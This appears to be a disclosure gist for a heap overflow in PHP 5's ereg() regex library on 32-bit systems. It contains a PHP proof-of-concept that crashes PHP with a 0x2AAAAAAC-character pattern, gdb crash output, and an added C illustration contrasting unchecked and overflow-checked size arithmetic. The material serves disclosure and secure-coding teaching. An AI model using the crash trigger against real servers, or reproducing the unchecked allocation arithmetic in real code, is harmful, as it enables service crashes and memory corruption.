Last active
August 29, 2015 14:15
crash in PHP 5 ereg() function / Full disclosure: heap overflow in H. Spencer’s regex library on 32 bit systems https://guidovranken.wordpress.com/2015/02/04/full-disclosure-heap-overflow-in-h-spencers-regex-library-on-32-bit-systems/
$ uname -a
Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:        14.04
Codename:       trusty
$ php --version
PHP 5.5.9-1ubuntu4.6 (cli) (built: Feb 13 2015 19:18:15)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
    with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies
$ ulimit -c unlimited
$ php5 -f test.php 0x2AAAAAAC
Segmentation fault (core dumped)
$ gdb php5 core
Reading symbols from php5...(no debugging symbols found)...done.
[New LWP 1253]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Core was generated by `php5 -f test.php 0x2AAAAAAC'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x080cd919 in ?? ()
gdb-peda$ bt
#0  0x080cd919 in ?? ()
#1  0x080ce252 in ?? ()
#2  0x080cedb8 in php_regcomp ()
#3  0x080cb3ce in ?? ()
#4  0x080cb8bb in ?? ()
#5  0x0841bbd2 in execute_internal ()
#6  0x083560c7 in dtrace_execute_internal ()
#7  0x0841f6a8 in ?? ()
#8  0x08392f57 in execute_ex ()
#9  0x08355fbd in dtrace_execute_ex ()
#10 0x0841d785 in zend_execute ()
#11 0x0836813e in zend_execute_scripts ()
#12 0x08303915 in php_execute_script ()
#13 0x0842197f in ?? ()
#14 0x08099767 in main ()
#15 0xb6fbba83 in __libc_start_main (main=0x8099240 <main>, argc=0x4, argv=0xbfad9e64, init=0x842a8f0 <__libc_csu_init>, fini=0x842a960 <__libc_csu_fini>, rtld_fini=0xb774a180 <_dl_fini>, stack_end=0xbfad9e5c) at libc-start.c:287
#16 0x080997f2 in _start ()
gdb-peda$ x/i $pc
=> 0x80cd919:   cmp    BYTE PTR [edi],0x0
gdb-peda$ i r
eax            0xe3        0xe3
ecx            0xe4        0xe4
edx            0xa531d70   0xa531d70
ebx            0x88c5000   0x88c5000
esp            0xbfad64a0  0xbfad64a0
ebp            0x8000041   0x8000041
esi            0xbfad6570  0xbfad6570
edi            0x8000082   0x8000082
eip            0x80cd919   0x80cd919
eflags         0x210206    [ PF IF RF ID ]
cs             0x73        0x73
ss             0x7b        0x7b
ds             0x7b        0x7b
es             0x7b        0x7b
fs             0x0         0x0
gs             0x33        0x33
gdb-peda$ quit
<?php
// test.php: proof of concept for the ereg() crash. The pattern length is
// read from the first command-line argument as a hexadecimal number, e.g.
// `php5 -f test.php 0x2AAAAAAC` (hexdec() skips the non-hex "x", so the
// 0x prefix is harmless).
$pattern = str_repeat("A", hexdec($argv[1]));
// Compiling a pattern of this length makes the regex library's 32-bit size
// arithmetic wrap, so the heap buffer for the compiled pattern is undersized
// (the heap overflow described in the linked write-up); php_regcomp then
// faults, as in the backtrace above.
echo ereg($pattern, "A");
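Why 0x2AAAAAAC in particular: the following C program is an added illustration, not code from the gist or from the regex library. It models the compiled-pattern buffer sizing as "len/2*3+2 elements, each 4 bytes" (that expression is my recollection of regcomp()'s strip allocation on a 32-bit build and should be treated as an assumption, as should ELEM_SIZE), and uses uint32_t so the i686 arithmetic from the gist reproduces on a 64-bit host. With the PoC's length the unchecked computation wraps to a 16-byte allocation; the checked variant beside it refuses the length instead.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* size32_t stands in for size_t on the i686 target of the gist, so the
 * wrap-around is reproducible on any host width. */
typedef uint32_t size32_t;

/* Bytes per compiled-pattern element on a 32-bit build (assumption). */
#define ELEM_SIZE 4u

/* Unchecked: element count derived from the pattern length as len/2*3+2,
 * then multiplied by the element size. Both steps are plain 32-bit
 * arithmetic, so a large len wraps modulo 2^32 and yields a tiny byte
 * count for malloc(). */
size32_t strip_bytes_unchecked(size32_t len)
{
    size32_t elems = len / 2u * 3u + 2u;
    return elems * ELEM_SIZE;
}

/* Checked: every multiply/add is bounds-tested before it happens.
 * Returns false when the byte count would not fit in 32 bits. */
bool strip_bytes_checked(size32_t len, size32_t *bytes_out)
{
    size32_t half = len / 2u;
    if (half > (UINT32_MAX - 2u) / 3u)
        return false;                  /* half*3+2 would wrap */
    size32_t elems = half * 3u + 2u;
    if (elems > UINT32_MAX / ELEM_SIZE)
        return false;                  /* elems*ELEM_SIZE would wrap */
    *bytes_out = elems * ELEM_SIZE;
    return true;
}

/* Hypothetical hardened allocation: refuse lengths whose size computation
 * wraps instead of handing malloc() a wrapped value. NULL on overflow or
 * allocation failure. */
void *alloc_strip(size32_t len, size32_t *bytes_out)
{
    size32_t bytes;
    if (!strip_bytes_checked(len, &bytes))
        return NULL;
    *bytes_out = bytes;
    return malloc(bytes);
}

int main(void)
{
    /* 0x2AAAAAAC is the argument used in the gist's PoC invocation. */
    const size32_t poc_len = 0x2AAAAAACu;
    const size32_t sane_len = 100u;
    size32_t bytes = 0;

    printf("len=0x%08x unchecked malloc size: %u bytes\n",
           poc_len, strip_bytes_unchecked(poc_len));
    printf("len=0x%08x checked: %s\n", poc_len,
           strip_bytes_checked(poc_len, &bytes) ? "ok" : "rejected (overflow)");

    void *buf = alloc_strip(sane_len, &bytes);
    printf("len=%u checked: %u bytes, buffer %s\n", sane_len, bytes,
           buf ? "allocated" : "NULL");
    free(buf);
    return 0;
}
```

The unchecked path computes 0x2AAAAAAC/2*3+2 = 0x40000004 elements, and 0x40000004*4 = 0x100000010 truncates to 0x10, so the allocator returns 16 bytes for a pattern that needs over a gigabyte of compiled state; everything the compiler writes past those 16 bytes lands on adjacent heap memory. Any length-derived allocation size in native code that handles attacker-controlled input needs the same pre-multiplication bounds check (or `__builtin_mul_overflow` where available), and 32-bit builds are where it bites first.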